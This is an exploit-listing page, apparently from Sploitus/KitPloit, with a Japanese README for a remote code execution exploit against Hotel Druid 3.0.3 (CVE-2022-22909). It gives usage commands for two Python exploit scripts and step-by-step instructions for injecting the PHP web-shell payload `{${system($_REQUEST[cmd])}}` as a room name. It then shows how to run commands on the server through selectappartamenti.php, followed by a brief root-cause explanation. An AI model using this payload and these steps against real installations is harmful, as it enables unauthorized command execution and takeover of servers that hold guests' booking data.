Sploitus

Exploit for CVE-2022-22909

kitploit · 2026-08-28

Exploit Code

MARKDOWN66 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-KAAL18-CVE-2022-22909
# CVE-2022-22909 Hotel Druid 3.0.3 - リモートコード実行 (RCE)

## kaal によるエクスプロイト

### エクスプロイト

  1. HotelDruidExploit.py



このエクスプロイトは、PHP ペイロードをルーム名として新しいルームを作成します。

使用方法 : `$ ./HotelDruidExploit.py -h`

![image](https://assets.kitploit.com/production/public/readmes/27817/500cf560f8b175f02d322a6501969df92d99faff0f12962659bbf591f106e38a.png)

`$ ./HotelDruidExploit.py -u http://127.0.0.1/hoteldruid`

![image](https://assets.kitploit.com/production/public/readmes/27817/88b3354dff92562ba89b7f2120194b5e3375c492aba4066d4a1dc385c02e10ed.png)

* * *

  2. HotelDruidExploitRoom.py



このエクスプロイトは、ルーム名を既に知っている場合に動作します。

使用方法 : `$ ./HotelDruidExploitRoom.py -u "http://127.0.0.1/hoteldruid" -r "abc"`

![image](https://assets.kitploit.com/production/public/readmes/27817/a86df077bacca93a22baf2f843d7a9014cf894361dcea21bc9128b784aea986f.png)

* * *

## エクスプロイトの手順 :

1). Hotel Druid ページに移動します。

2). Tables -> Rooms をクリックします。

![image](https://assets.kitploit.com/production/public/readmes/27817/f334291b674aad6abc11c2eb528005a6aca4a22d4efaee322c74a30f6a7b3ee3.png)

3). Create New Room フィールドに以下の PHP コードを追加し、Add をクリックします。

`{${system($_REQUEST[cmd])}}`

![image](https://assets.kitploit.com/production/public/readmes/27817/7c1ed7c00a476bb350ed193d9390f60675d6ce51622658328d1cfe14cd39e399.png)

4). 「Room」名フィールドにペイロードを含む新しいルームが表示されます。

![image](https://assets.kitploit.com/production/public/readmes/27817/002bf2269bdabeb38ffbbdfa3d7b24b05ca779a1e11a2d1efbfbc07cdc4f8ba1.png)

5). 以下のリンクにアクセスするとコマンド実行ができ、後でフルシェルを取得できます。

http://127.0.0.1/hoteldruid/dati/selectappartamenti.php?cmd=whoami

注 : IP を hoteldruid ターゲットの IP に変更してください。

## 脆弱性の説明 :

この脆弱性は、ルーム名が `/var/www/html/hoteldruid/dati/selectappartamenti.php` 内に保存されるために発生します。

![image](https://assets.kitploit.com/production/public/readmes/27817/7da1df64da889066ba66c0fb55e3cd6b66afd950203a3c6fb6ee8c6db5225513.png)

そして `selectappartamenti.php` は PHP ファイルであるため、そのファイル内の PHP コードはサーバーによって実行されます。